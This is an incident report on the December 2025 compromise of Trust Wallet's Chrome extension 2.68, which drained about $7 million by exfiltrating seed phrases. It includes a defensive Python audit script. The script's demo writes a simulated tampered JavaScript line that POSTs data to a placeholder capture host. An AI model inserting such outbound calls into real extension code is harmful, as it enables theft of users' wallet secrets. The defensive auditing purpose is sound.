Incident Overview
On December 26, 2025, reports emerged of mass unauthorized withdrawals from Trust Wallet’s Chrome browser extension, version 2.68. Within hours of a routine update, attackers deployed malicious code within the extension that silently captured seed phrases and private keys. Victims reported sudden drains of funds across multiple chains, with preliminary on-chain analysis indicating losses of around $7 million.
Attack Vector and Timeline
- December 24, 2025: Version 2.68 released via Chrome Web Store.
- December 26, 2025, 00:15 UTC: Blockchain sleuth ZachXBT alerts community after observing rapid fund movements from diverse wallets.
- December 26, 2025, 02:00 UTC: PeckShield confirms siphoning of >$6 million, with ~40% of stolen assets laundered through centralized exchanges.
- December 26, 2025, 04:30 UTC: Trust Wallet issues advisory to disable version 2.68 and upgrade to patched version 2.69.
- December 26, 2025, 07:42 UTC: Trust Wallet confirms total losses of ~$7 million and pledges full user compensation.
Technical Analysis
Attackers embedded a supply-chain backdoor by injecting PostHog JS instrumentation into the extension’s core scripts. This enabled real-time exfiltration of decrypted seed phrases and private key material to a malicious endpoint. On-chain clustering reveals that stolen assets were split across Bitcoin, Ethereum, Solana, and other EVM-compatible tokens, with proceeds aggregated into a small set of withdrawal addresses before distribution to exchanges for conversion to fiat.
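A defender-side check for the kind of tampering described above, added here as an example and not code from Trust Wallet or its auditors: it audits an unpacked extension directory for the advisory's affected version, for outbound hosts absent from an allow list, and for file-hash drift from a known-good baseline. The allow list, the placeholder hosts, and the sample extension files are constructed for this example.

```python
"""Audit an unpacked browser extension: version flag, unexpected outbound
hosts in bundled JS, and file-hash drift from a known-good baseline."""
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Assumptions for this example: hosts the extension may legitimately contact
# (constructed placeholder) and the version named in the advisory.
ALLOWED_HOSTS = {"api.wallet.example"}
AFFECTED_VERSIONS = {"2.68"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def _allowed(host):
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)

def audit_extension(ext_dir):
    """Return version flag, unexpected hosts per JS file, and SHA-256 per file."""
    ext_dir = Path(ext_dir)
    version = json.loads((ext_dir / "manifest.json").read_text())["version"]
    report = {"version": version, "version_affected": version in AFFECTED_VERSIONS,
              "unexpected_hosts": {}, "hashes": {}}
    for js in sorted(ext_dir.rglob("*.js")):
        data = js.read_bytes()
        rel = js.relative_to(ext_dir).as_posix()
        report["hashes"][rel] = hashlib.sha256(data).hexdigest()
        hosts = URL_RE.findall(data.decode("utf-8", "replace"))
        bad = sorted({h for h in hosts if not _allowed(h)})
        if bad:
            report["unexpected_hosts"][rel] = bad
    return report

def changed_files(report, baseline_hashes):
    """Files whose hash differs from, or is missing in, the known-good baseline."""
    return sorted(f for f, h in report["hashes"].items() if baseline_hashes.get(f) != h)

def run_demo():
    """Constructed sample: a clean build, then the same build with an added call."""
    root = Path(tempfile.mkdtemp())
    (root / "manifest.json").write_text(json.dumps({"name": "demo-wallet", "version": "2.68"}))
    (root / "content.js").write_text('fetch("https://api.wallet.example/v1/prices");\n')
    baseline = audit_extension(root)["hashes"]  # hashes of the clean build
    # Simulated tampered build: one extra outbound call to a host not on the allow list
    (root / "content.js").write_text(
        'fetch("https://api.wallet.example/v1/prices");\n'
        'fetch("https://telemetry.example.invalid/capture", {method: "POST"});\n')
    after = audit_extension(root)
    after["changed_files"] = changed_files(after, baseline)
    return after
```

In practice the baseline hashes would be taken from a build you verified before the update, and the allow list from the vendor's documented endpoints.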
Mitigation and Response
Trust Wallet released version 2.69, which removed the malicious code and rotated critical signatures used in extension updates. Affected users were urged to revoke extension permissions, transfer remaining assets to fresh wallets, and enable two-factor authentication where available. Binance founder Changpeng Zhao (CZ) publicly guaranteed reimbursement under the SAFU fund. Independent security firms are auditing the codebase and monitoring for residual vulnerabilities.
Broader Implications
This incident underscores the heightened risk surrounding browser-based wallet extensions. Unlike hardware or fully standalone desktop clients, browser extensions operate within the security context of the browser, increasing their attack surface. Experts recommend use of hardware wallets or account-abstraction solutions that enforce transaction delays and require explicit user approvals for code-level changes.
Key Takeaways
- Supply-chain compromise can inject malicious code directly into legitimate software updates.
- Rapid advisory and patch rollout, combined with public compensation guarantees, are critical for damage control.
- Browser-extension environments remain vulnerable; users should consider hardware or multi-sig alternatives for large holdings.